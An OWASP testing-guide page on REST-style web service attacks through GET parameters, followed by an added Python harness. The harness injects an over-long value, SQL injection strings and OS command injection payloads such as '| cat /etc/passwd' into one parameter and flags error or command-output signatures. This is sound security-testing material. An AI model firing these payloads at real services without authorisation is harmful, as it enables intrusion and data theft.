Difference between revisions of "Testing for WS HTTP GET parameters/REST attacks (OWASP-WS-005)"
Revision as of 10:58, 2 November 2006
HTTP GET parameters.
Brief Summary
Many XML applications are invoked by passing them parameters in HTTP GET queries. Such services are sometimes called "REST-style" web services (REST stands for Representational State Transfer). They can be attacked by placing malicious content in the HTTP GET query string, for example an over-long parameter value (2048 characters), SQL statements/injection, or OS command injection.
Description of the Issue
Because a REST-style web service is, in effect, HTTP in and web service out, its attack patterns are very similar to the regular HTTP attack vectors discussed throughout the guide.
Example: for a request whose query string is ?viewDetail=detail-10293, the HTTP GET parameter is viewDetail and its value is detail-10293; that value is what the tester replaces with malicious content.
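The test the text describes, as an added example that is not part of the original OWASP page: a small black-box harness that takes one GET parameter of a REST-style endpoint, substitutes each payload class named above (an over-long value, SQL injection strings, OS command injection strings) and screens the responses for signatures that suggest the value reached a back-end interpreter. The endpoint URL, the parameter name viewDetail, the payload lists and the stand-in "server" responses are all constructed here for illustration; nothing is sent over the network unless a real client is passed as send.

```python
# Added example (not from the original OWASP page). The URL, parameter,
# payload lists and the fake back end are constructed for illustration.
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumed target, modelled on the page's /viewDetail=detail-10293 example.
EXAMPLE_URL = "http://ws.example/detail?viewDetail=detail-10293"
EXAMPLE_PARAM = "viewDetail"

LONG_VALUE = "A" * 2048                      # the 2048-char case from the text
SQLI_PAYLOADS = ["'", "' OR '1'='1", "detail-10293' AND 1=2--"]
OSI_PAYLOADS = ["; id", "| cat /etc/passwd", "`uname -a`"]

# Response fragments that usually mean the parameter was interpreted unescaped.
SQL_ERROR_RE = re.compile(
    r"(you have an error in your sql syntax|unclosed quotation mark|"
    r"ORA-\d{5}|pg_query\(\)|SQLSTATE\[)", re.I)
OS_OUTPUT_RE = re.compile(r"(uid=\d+\(|root:x:0:0:|Linux \S+ \d+\.\d+)")


def mutate_url(url, param, value):
    """Return url with GET parameter param set to value; other params are kept."""
    parts = urlsplit(url)
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)
             if k != param]
    query.append((param, value))
    return urlunsplit(parts._replace(query=urlencode(query)))


def test_cases(url, param):
    """Yield (label, mutated_url) for every payload class the text names."""
    yield "long-2048", mutate_url(url, param, LONG_VALUE)
    for p in SQLI_PAYLOADS:
        yield "sqli", mutate_url(url, param, p)
    for p in OSI_PAYLOADS:
        yield "osi", mutate_url(url, param, p)


def classify(status, body):
    """Map an HTTP response to a verdict: what the injected value appears to have hit."""
    if SQL_ERROR_RE.search(body):
        return "sql-error"
    if OS_OUTPUT_RE.search(body):
        return "os-output"
    if status >= 500:
        return "server-error"
    return "ok"


def _fake_send(mutated_url):
    """Constructed stand-in for an HTTP client. It models a back end that
    concatenates the parameter into SQL and into a shell command and has
    no length check, so the harness can run offline."""
    value = dict(parse_qsl(urlsplit(mutated_url).query)).get(EXAMPLE_PARAM, "")
    if len(value) > 1024:
        return 500, "Internal Server Error"
    if "'" in value:
        return 200, "You have an error in your SQL syntax near ''''"
    if value.startswith((";", "|")):
        return 200, "uid=33(www-data) gid=33(www-data)"
    return 200, '<detail id="detail-10293"/>'


def run(url, param, send=_fake_send):
    """Send every test case; return [(label, mutated_url, verdict)].
    send(url) must return (status_code, body_text); a real client such as
    a requests.get wrapper can be passed in place of the fake one."""
    return [(label, u, classify(*send(u))) for label, u in test_cases(url, param)]


if __name__ == "__main__":
    for label, u, verdict in run(EXAMPLE_URL, EXAMPLE_PARAM):
        print(f"{label:10} {verdict:13} {u[:80]}")
```

Against the constructed back end the over-long value produces a 500, every quote-bearing SQL payload surfaces a database error string, and the two shell-metacharacter payloads echo command output; the backtick payload is reported as "ok" only because the fake back end does not model it, which is the usual reminder that a clean verdict from signature matching is absence of evidence, not evidence of absence.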